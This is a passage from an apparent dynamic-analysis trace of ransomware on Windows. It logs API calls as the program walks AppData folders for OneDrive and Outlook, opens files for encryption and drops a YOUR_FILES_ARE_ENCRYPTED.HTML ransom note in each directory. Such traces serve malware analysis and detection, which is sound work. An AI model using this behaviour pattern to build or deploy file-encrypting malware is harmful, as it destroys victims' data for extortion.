param_1=0x4ebce1e, param_2="%02X" | out: param_1="A1") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="DF") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="42") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="0F") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="74") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="99") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="25") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="B2") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="ED") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="CF") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="85") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="51") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="A6") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="DF") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="37") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="FD") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="5D") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="FB") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="A0") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="C0") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="32") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="09") returned 2 
[0163.330] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="E5") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="D2") returned 2 [0163.330] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="40") returned 2 [0163.331] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="4E") returned 2 [0163.331] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log" [0163.331] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.331] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0163.332] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3cedd50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae850d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3b04, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085815_b24-b2c.log", cAlternateFileName="2021-0~3.LOG")) returned 1 [0163.332] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log") returned 97 [0163.332] lstrcmpW (lpString1="2021-02-23_085815_b24-b2c.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.334] 
PathFindExtensionW (pszPath="2021-02-23_085815_b24-b2c.log") returned=".log" [0163.334] lstrlenW (lpString=".log") returned 4 [0163.334] PathFindExtensionW (pszPath="2021-02-23_085815_b24-b2c.log") returned=".log" [0163.334] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.334] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.345] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=15108) returned 1 [0163.345] GetProcessHeap () returned 0x270000 [0163.345] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.346] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="AE") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="01") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="B8") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="03") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="04") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="9A") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="4E") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="97") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="A6") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="EC") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce2e, 
param_2="%02X" | out: param_1="20") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="A9") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="FF") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="C6") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="2F") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="DE") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="20") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="38") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="C7") returned 2 [0163.346] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="71") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="04") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="6F") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="E1") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="DC") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="EE") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="F1") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="0E") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="40") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="9F") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="48") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="54") returned 2 [0163.347] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="01") returned 2 [0163.348] lstrcpyW 
(in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085815_b24-b2c.log" [0163.348] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.348] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.348] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3cedd50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae850d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x3b04, dwReserved0=0x0, dwReserved1=0x60, cFileName="2021-02-23_085815_b24-b2c.log", cAlternateFileName="2021-0~3.LOG")) returned 0 [0163.348] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.348] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0163.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0163.394] 
WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.397] CloseHandle (hObject=0x5b8) returned 1 [0163.397] GetProcessHeap () returned 0x270000 [0163.399] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.399] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3cedd50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3cedd50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 0 [0163.400] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.400] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0163.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\setup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.400] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.403] CloseHandle (hObject=0x58c) returned 1 [0163.404] GetProcessHeap () returned 0x270000 [0163.405] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.405] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 0 [0163.405] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.405] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0163.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.414] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.417] CloseHandle (hObject=0x4a8) returned 1 [0163.417] GetProcessHeap () returned 0x270000 [0163.418] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.419] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, 
ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Outlook", cAlternateFileName="")) returned 1 [0163.419] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook") returned 55 [0163.419] GetProcessHeap () returned 0x270000 [0163.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.419] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook" [0163.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\*" [0163.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.420] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, 
ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.420] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gliding", cAlternateFileName="")) returned 1 [0163.420] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding") returned 63 [0163.420] GetProcessHeap () returned 0x270000 [0163.420] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.420] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding" [0163.420] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*" [0163.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.421] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.421] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4438380, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4438380, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4438380, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0163.421] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.421] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0163.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\gliding\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\gliding\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
hTemplateFile=0x0) returned 0x58c [0163.542] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.546] CloseHandle (hObject=0x58c) returned 1 [0163.546] GetProcessHeap () returned 0x270000 [0163.547] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.547] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf48faf80, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x69a2e4b0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x69a2e4b0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0x0, dwReserved1=0x60, cFileName="mapisvc.inf", cAlternateFileName="")) returned 1 [0163.547] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 67 [0163.547] lstrcmpW (lpString1="mapisvc.inf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.547] PathFindExtensionW (pszPath="mapisvc.inf") returned=".inf" [0163.547] lstrlenW (lpString=".inf") returned 4 [0163.547] PathFindExtensionW (pszPath="mapisvc.inf") returned=".inf" [0163.547] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 1 
[0163.548] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned 65 [0163.548] GetProcessHeap () returned 0x270000 [0163.548] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.548] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache" [0163.548] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*" [0163.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.550] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.550] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x1a6, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat", cAlternateFileName="STREAM~3.DAT")) returned 1 [0163.550] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat") returned 131 [0163.550] lstrcmpW 